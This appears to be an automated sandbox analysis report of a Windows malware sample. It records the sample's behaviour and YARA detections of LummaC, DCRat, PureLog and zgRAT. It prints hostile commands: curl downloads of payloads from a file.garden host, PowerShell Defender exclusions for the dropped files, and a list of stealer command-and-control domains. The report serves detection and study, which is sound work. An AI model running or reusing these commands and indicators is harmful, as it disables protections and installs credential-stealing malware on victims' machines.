Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\Speech\physmeme.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Speech\physmeme.exe

Code function: 9_2_02852129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

9_2_02852129

Injects a PE file into a foreign processes

Source: C:\Windows\Speech\physmeme.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strappystyio.shop
Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: coursedonnyre.shop
Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fossillargeiw.shop
Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tendencerangej.shop
Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: appleboltelwk.shop
Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tearrybyiwo.shop
Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: captainynfanw.shop
Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: surveriysiop.shop
Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tiddymarktwo.shop

Writes to foreign memory regions

Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45F000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A64008	Jump to behavior

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Code function: 0_2_00007FF68B4BECD0 pow,pow,pow,sqrt,mouse_event,mouse_event,_invalid_parameter_noinfo_noreturn,

0_2_00007FF68B4BECD0

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3594.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP"
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37B7.tmp" "c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4evtisdSvL.bat"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_0016F654 cpuid

5_2_0016F654

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: GetLocaleInfoEx,FormatMessageA,		0_2_00007FF68B4CB920
Source: C:\Windows\Speech\kdmapper.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		5_2_0016AF0F

Source: C:\Windows\Speech\physmeme.exe	Queries volume information: C:\Windows\Speech\physmeme.exe VolumeInformation	Jump to behavior
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Edge\msedge.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Queries volume information: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Queries volume information: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Queries volume information: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Queries volume information: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Queries volume information: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Code function: 0_2_00007FF68B4CB79C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF68B4CB79C

Source: C:\Windows\Speech\kdmapper.exe

Code function: 5_2_0015B146 GetVersionExW,

5_2_0015B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 4tXm5yPtiy.exe, 4tXm5yPtiy.exe, 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmp, 4tXm5yPtiy.exe, 00000000.00000000.1415368095.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: ollydbg.exe

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000000F.00000002.1706544888.00000000131A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 4584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 6872, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 5.3.kdmapper.exe.66016cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.msedge.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.66016cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.65ff6cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.65ff6cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1650599430.0000000000C92000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 5.3.kdmapper.exe.66016cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.msedge.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.66016cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.65ff6cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.65ff6cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000000F.00000002.1706544888.00000000131A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 4584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 6872, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 5.3.kdmapper.exe.66016cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.msedge.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.66016cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.65ff6cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.65ff6cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.1492361002.00000000065B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1491863067.00000000065B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1650599430.0000000000C92000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 5.3.kdmapper.exe.66016cf.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.msedge.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.66016cf.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.65ff6cf.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.kdmapper.exe.65ff6cf.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Edge\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	21 Input Capture	1 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Native API	1 DLL Side-Loading	411 Process Injection	111 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	4 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	21 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
